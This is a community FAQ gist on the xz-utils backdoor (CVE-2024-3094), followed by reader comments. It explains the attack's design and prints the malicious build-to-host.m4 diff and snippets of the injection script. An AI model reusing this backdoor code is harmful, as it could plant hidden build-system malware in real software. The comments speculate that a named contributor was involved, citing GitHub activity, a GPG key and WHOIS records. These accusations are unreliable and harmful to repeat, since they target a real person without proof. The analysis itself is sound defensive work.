@thesamesam
Last active November 4, 2024 18:32
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is written in good faith and to the best of our knowledge, but we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed; statistically, your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may yet be discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild, where it gets activated by connections, resulting in performance issues, but we do not know yet what is required to bypass authentication (etc.) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh is vulnerable, but pending further analysis of the payload, we cannot be certain that other configurations aren't.
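
A minimal sketch of checking the version condition above, assuming `xz` is on `PATH` and prints its version in the usual `xz (XZ Utils) X.Y.Z` form. The function name `is_backdoored_version` is made up for illustration. It only compares version strings, so it says nothing about distro packages that were rebuilt or renumbered after the disclosure.

```shell
# Hypothetical helper: succeeds only for the two release versions named above.
is_backdoored_version() {
  case "$1" in
    5.6.0|5.6.1) return 0 ;;
    *) return 1 ;;
  esac
}

# Report on the locally installed xz, if there is one.
if command -v xz >/dev/null 2>&1; then
  # The first line looks like "xz (XZ Utils) 5.4.5"; keep the last field.
  installed=$(xz --version | head -n 1 | awk '{print $NF}')
  if is_backdoored_version "$installed"; then
    echo "xz $installed: one of the affected releases, update now"
  else
    echo "xz $installed: not one of the two known-bad releases"
  fi
fi
```

Your distribution's security advisory remains the authoritative source; this is only a quick first look.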

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL;DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc; that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)
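
To see how the quoted expression evaluates for concrete values of `$build`, here is a harmless sketch that wraps the same test and only prints the result. In shell, `!` negates just the first parenthesised command, so the expression as written reads "not x86_64, and linux-gnu". The function name `build_check_fires` and the sample triplets are assumptions for illustration; what the surrounding script does when the test is true is not part of the snippet above.

```shell
# Hypothetical wrapper around the quoted condition; it only reports the result.
build_check_fires() {
  build=$1
  if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1); then
    echo yes
  else
    echo no
  fi
}

# Sample build triplets (illustrative values only).
for triplet in x86_64-pc-linux-gnu aarch64-unknown-linux-gnu x86_64-pc-linux-musl; do
  printf '%s -> %s\n' "$triplet" "$(build_check_fires "$triplet")"
done
```

Of these three samples, only the non-x86_64 glibc triplet makes the test true.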

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0
  fi

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thus seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.
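
Packagers who want to know whether a given build environment would have matched the packaging test quoted above can reproduce it in isolation. This is a sketch under assumptions: the function name `looks_like_distro_build` is invented, and it mirrors only that one test, not the architecture or toolchain checks.

```shell
# Hypothetical helper mirroring the quoted packaging test; it only reports.
# $1: source directory of the build, $2: value of RPM_ARCH (may be empty)
looks_like_distro_build() {
  srcdir=$1
  rpm_arch=$2
  if test -f "$srcdir/debian/rules" || test "x$rpm_arch" = "xx86_64"; then
    echo "matches"
  else
    echo "no match"
  fi
}

# Example: check the current directory with whatever RPM_ARCH is set to.
looks_like_distro_build . "${RPM_ARCH:-}"
```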

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl
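
The added lines in the diff chain a few small text-processing steps: `gl_am_configmake` is set to the file(s) in the source tree that contain a marker, the part of that filename after the last dot becomes a command name, and the file's bytes are swapped with `tr` before being piped into that command with `-d`. Below is a minimal sketch of the extension and byte-swap steps on harmless data. The filename and function names are made up, and the hyphen is written as the octal escape `\055` instead of the macro's `\-` purely for portability.

```shell
# The part of a filename after the last dot, as the sed expression in the
# diff computes it (for a name ending in ".xz" this yields "xz").
ext_of() {
  echo "$1" | sed "s/.*\.//g"
}

# Swap tab<->space and hyphen<->underscore, byte for byte.
# Same mapping as gl_path_map; \055 is the octal escape for "-".
swap_bytes() {
  tr '\t \055_' ' \t_\055'
}

ext_of "example/made-up-name.xz"               # prints: xz
printf 'a-b_c\n' | swap_bytes                  # prints: a_b-c
printf 'a-b_c\n' | swap_bytes | swap_bytes     # prints: a-b_c
```

Because the mapping is its own inverse, applying it twice returns the original bytes, which is how a file can sit in the repository looking corrupt and still be restored at build time.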

Payload

If those conditions are met, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know what the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd; it is simply unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).
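
One way to see whether the indirect loading path described above applies to a given machine is to list the shared libraries `sshd` is linked against. This is a minimal sketch, assuming `ldd` is available and that `sshd` is on `PATH` or at `/usr/sbin/sshd`; the function name is made up. A clean result only covers link-time dependencies (direct or transitive), not libraries loaded later at runtime.

```shell
# Hypothetical helper: reads `ldd` output on stdin, succeeds if liblzma appears.
mentions_liblzma() {
  grep -q 'liblzma\.so'
}

# Fall back to the conventional path if sshd is not on PATH.
sshd_path=$(command -v sshd 2>/dev/null || echo /usr/sbin/sshd)
if [ -x "$sshd_path" ] && command -v ldd >/dev/null 2>&1; then
  if ldd "$sshd_path" 2>/dev/null | mentions_liblzma; then
    echo "$sshd_path links liblzma (directly or via another library)"
  else
    echo "$sshd_path does not link liblzma"
  fi
fi
```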

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse began the long work ahead of him.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns that some other projects are affected (either by themselves, or because changes were made to them to facilitate the xz backdoor). I want to avoid a witch-hunt, but I am listing some examples here which have already been widely linked, to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise and such; please see e.g. https://discord.gg/TPz7gBEE (for both reverse engineering and OSINT). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projects which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???
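
The tarball-versus-git comparison in the list above can be sketched roughly as follows, assuming a local clone, a release tag, and an already-downloaded release tarball (all three arguments are placeholders, and the function name is invented). Generated autotools files such as `configure` will legitimately show up as tarball-only, so the output is a starting point for review rather than a verdict.

```shell
# Hypothetical helper: list files that differ between a git tag and a tarball.
# Usage: compare_tag_to_tarball /path/to/clone TAG /path/to/release.tar.gz
compare_tag_to_tarball() {
  repo=$1 tag=$2 tarball=$3
  work=$(mktemp -d) || return 1
  mkdir "$work/git" "$work/tarball"
  # Export the tagged tree exactly as git has it.
  git -C "$repo" archive --format=tar "$tag" | tar -x -C "$work/git"
  # Unpack the release tarball, dropping its top-level directory.
  tar -x -f "$tarball" -C "$work/tarball" --strip-components=1
  # -r: recurse, -q: only name files that differ or exist on one side.
  diff -rq "$work/git" "$work/tarball"
  status=$?
  rm -rf "$work"
  return "$status"
}
```

A non-zero exit status means at least one file differs or exists on only one side; each reported path then needs a human to decide whether it is expected build-system output.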

References and other reading material

@christoofar

Saw an interesting commit over in cpython: python/cpython@ea51476

It's part of PR python/cpython#115989

The bytecode there seems to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)
b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c)
c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91)
d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario, but it reminded me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this; it could just be poor timing (everything can look suspicious in hindsight). The person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for a different architecture than the known backdoor. I just wondered if this risked adding a form of backdoor to python at the time, even by accident.

Our little friend is on GitLab and he asked for filter enhancements to Wireshark. Still has two MRs out there waiting to push in.
https://gitlab.com/wireshark/wireshark/-/merge_requests?scope=all&state=merged&author_username=ivq

@thesamesam we have a winner

@gonoph

gonoph commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious

Chien Wong - I looked at his github:

  • Created in 2015
  • bunch of activity in the last year 2023+
  • 2020, started putting in some activity into other repos
  • "lessons learned from lzma" post was created 3 weeks ago
  • created his homepage on github pages 4 months ago

The only anomaly is: GitHub says his profile is in Nanjing, China, with a TZ of GMT+08, but:

  • created the current home page on Christmas Eve (Dec 24th, 2023)
  • then updated his 404 page for New Years (Jan 1st, 2024)

However, not a smoking gun of anything at this point.

In fact, if you use the Internet Archive (TW:language) to view his past incarnations, you can see it has been hosted since 2015 as well. Interestingly enough, on the 2017 copy of the website, his name is Ch'ien Wang instead of Chien Wong. I'm not familiar enough with Chinese names to know if that is odd or not.

This profile looks organic. My own github activity history has a similar pattern. I'm also bad about keeping my homepage up to date.

He also committed several changes to Wireshark in 2022 and 2023. It looks like several commits for Wireshark's 802.11 Wi-Fi handling: to meet the spec more accurately, to add a new capability to it for IPv6, and to fix a bug. I'm not an 802.11 expert, but the code doesn't look unsafe at a cursory glance for the most part.

There's some rework in this commit to address A-MSDU dissecting that is addressing the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

          /* The last A-MSDU subframe has no padding. */
          if (last_subframe)
            subframe_length = 14+msdu_length;
          else
            subframe_length = WS_ROUNDUP_4(14+msdu_length);

The only odd thing is his gpg key, which has a ridiculous 10 year expiration time. That could be the tool he used.

$ gpg --keyserver keyserver.ubuntu.com --recv-key 5CA58A39FA4122AD
$ gpg --list-sig 5CA58A39FA4122AD
pub   ed25519 2022-06-21 [SC] [expires: 2032-06-18]
      615887C24F853CE9191F944E5CA58A39FA4122AD
uid           [ unknown] Chien Wong <m@xv97.com>
sig 3        5CA58A39FA4122AD 2022-06-21  Chien Wong <m@xv97.com>
sub   cv25519 2022-06-21 [E] [expires: 2032-06-18]
sig          5CA58A39FA4122AD 2022-06-21  Chien Wong <m@xv97.com>

@imelon123

Registrant Country of the domain very likely changed to CN on 2023-06-05T11:01:50Z

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-06-05T11:01:50Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2024-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: Jiangsu
Registrant Postal Code: DATA REDACTED
Registrant Country: CN
Registrant Phone: DATA REDACTED

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-09-08T08:08:33Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2023-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: None
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2020-05-26T08:11:21Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2021-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: None
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: DATA REDACTED

@zacanger

zacanger commented Apr 3, 2024

@gonoph

his name is Ch'ien Wang instead of Chien Wong. I'm not familiar enough with Chinese names to know if that is odd or not.

The interesting bit is that it's mixing romanizations. Ch'ien is Wade-Giles, Chien is simplified Wade, and Qian (implied by his work email, qwang) would be pinyin. Wong and Wang are also likely the same name, depending on location. Could definitely be an immigrant to the mainland from Taiwan or overseas, or just changing it based on stylistic preference.

@lhmouse

We do not know how to pronounce 'Chien'.

Qián

@RufusExE

RufusExE commented Apr 3, 2024

In my personal opinion, based on the current evidence of long-term lurking and preparation, it can be inferred that this individual has motives and plans, thinks clearly and cautiously, and the information related to their background and daily routine may be distorted or manipulated. Any records left behind could potentially be intentional.

@lhmouse

lhmouse commented Apr 3, 2024

@zacanger

Wong and Wang are also likely the same name,

As far as I know, no transliteration scheme for Mandarin ever confuses 'Wong' with 'Wang':
(https://resources.allsetlearning.com/chinese/)

| Sample | IPA | Pinyin | Wade-Giles |
|---|---|---|---|
| 王 | [u̯ɑŋ] | Wang | Wang |
| 翁 | [u̯əŋ] | Weng | Weng |
| 雍 | [i̯ʊŋ] | Yong | Yung |
| 锺/钟 | [tʂʊŋ] | Zhong | Chung |

@orangepizza

Could the logs from git.tukaani.org give us more detail about the commits, such as which IP they came from, or the difference between merge time and commit time?
I think GitHub surely has this, but I'm not sure about Lasse's logs, since they would already be a few years old.

@rdebath

rdebath commented Apr 3, 2024

The only odd thing is his gpg key, which has a ridiculous 10 year expiration time.

That is 3650 days, exactly the sort of period that would be chosen by someone who believes they have to choose a period but doesn't want to be bothered by it. In fact I'm not even sure which way (too long or too short) you believe that it is "ridiculous", as it has been widely used as a replacement for "never expires". I would assume "too long" due to the insecurity and value assumptions about websites of the CAB.
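
For reference, the 3650-day figure can be checked against the creation and expiry dates in the key listing quoted earlier (2022-06-21 and 2032-06-18). The sketch below uses a standard days-from-civil-date calculation in plain shell arithmetic; the function name is made up, and it assumes Gregorian dates with a positive year, passed without leading zeros.

```shell
# days_from_civil YEAR MONTH DAY: days since 1970-01-01 (Gregorian, year >= 1).
# The body runs in a subshell, via ( ), so its variables do not leak.
# Pass numbers without leading zeros (6, not 06) to avoid octal parsing.
days_from_civil() (
  y=$1 m=$2 d=$3
  # Treat January and February as the last months of the previous year.
  if [ "$m" -le 2 ]; then y=$((y - 1)); fi
  era=$(( y / 400 ))
  yoe=$(( y - era * 400 ))
  mp=$(( (m + 9) % 12 ))
  doy=$(( (153 * mp + 2) / 5 + d - 1 ))
  doe=$(( yoe * 365 + yoe / 4 - yoe / 100 + doy ))
  echo $(( era * 146097 + doe - 719468 ))
)

created=$(days_from_civil 2022 6 21)
expires=$(days_from_civil 2032 6 18)
echo "validity: $((expires - created)) days"   # prints: validity: 3650 days
```

Ten calendar years from that creation date would be 3653 days because of the leap days in 2024, 2028 and 2032, which is why the expiry lands three days short of the anniversary.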

@daniel-dona

Saw an interesting commit over in cpython: python/cpython@ea51476
It's part of PR python/cpython#115989
The bytecode there seems to be .xz test files from the 5.6.1 release.
Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)
I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:
a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)
b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c)
c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91)
d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario, but it reminded me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)
Not saying that person is involved in this; it could just be poor timing (everything can look suspicious in hindsight). The person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for a different architecture than the known backdoor. I just wondered if this risked adding a form of backdoor to python at the time, even by accident.

Our little friend is on GitLab and he asked for filter enhancements to Wireshark. Still has two MRs out there waiting to push in. https://gitlab.com/wireshark/wireshark/-/merge_requests?scope=all&state=merged&author_username=ivq

@thesamesam we have a winner

What's the problem with the Gitlab MRs?

@xry111

xry111 commented Apr 3, 2024

@zacanger

Wong and Wang are also likely the same name,

As far as I know, no transliteration scheme for Mandarin ever confuses 'Wong' with 'Wang': (https://resources.allsetlearning.com/chinese/)

| Sample | IPA | Pinyin | Wade-Giles |
|---|---|---|---|
| 王 | [u̯ɑŋ] | Wang | Wang |
| 翁 | [u̯əŋ] | Weng | Weng |
| 雍 | [i̯ʊŋ] | Yong | Yung |
| 锺/钟 | [tʂʊŋ] | Zhong | Chung |

https://en.wikipedia.org/wiki/Wong_(surname)

@Z-nonymous

I think this removes all doubt.

ivq/homepage@696470a#diff-36b91ec80ca75f577eb44c59060b08c14c8a7dda2f9bebabe65f31278d4e7a65

Thanks @christoofar, that's a great find.

Especially that posts/c-api-design-learned-from-lzma/index.html file.

I also find it weird that one would add the test files from xz when they're actually not used in the tests, from what I understood.

In my personal opinion, based on the current evidence of long-term lurking and preparation, it can be inferred that this individual has motives and plans, thinks clearly and cautiously, and the information related to their background and daily routine may be distorted or manipulated. Any records left behind could potentially be intentional.

I agree, given the obfuscation to try to make it happen "in plain sight", it would certainly have been prepared with crafted personas to point fingers in a different direction should it be discovered.
There's so many possibilities behind this that at layman level, we can only speculate, and only intelligence agencies can get to the bottom of this.

For those who like to imagine stories and theories and are averse to Occam's razor (others can skip), you can start by checking when gzip was replaced by xz, and what the history behind LZMA is. You can also check the timeline of when JiaT75 was activated. Also remember old news, read wikipedia articles here , there, here and also read tech news like this, or this, and you can imagine hundreds of possible stories. You can also throw away Occam's razor, and imagine others used that to do triple or quadruple finger-pointing indirections.

But don't read too much, one might end up hallucinating more than an LLM.

For sure Intelligence Agencies have mapped out all possibilities and are investigating all.

@pillowtrucker

Reminder: the z-anomyous's guy original claim to expertise is that he supposedly wrote advanced programmes like this https://www.cvedetails.com/cve/CVE-1999-1208/ for "commercial unix" 25 years ago. Not that I believe he's ever even seen AIX or HPUX, but that's a pretty funny claim considering those unixes were notoriously awful and a general laughing stock in terms of engineering AND security.
Now your smoking gun to blame another Chinese guy is that he made a blog about the allocator ?
I'm not sure if you're really good at masking malice as incompetence, or if you're genuinely a low iq schizophrenic.
All Easter spent trying to blame China.

@Z-nonymous

Z-nonymous commented Apr 3, 2024

Now your smoking gun to blame another Chinese guy is that he made a blog about the allocator ?

Read this https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504

The malware implements a custom allocator, which is obtained from get_lzma_allocator @ 0x4050

Reminder: the z-anomyous's guy original claim to expertise is that he supposedly wrote advanced programmes like this https://www.cvedetails.com/cve/CVE-1999-1208/ for "commercial unix" 25 years ago.

That CVE 👍 I never understood why one in their right mind would count starting with 0.
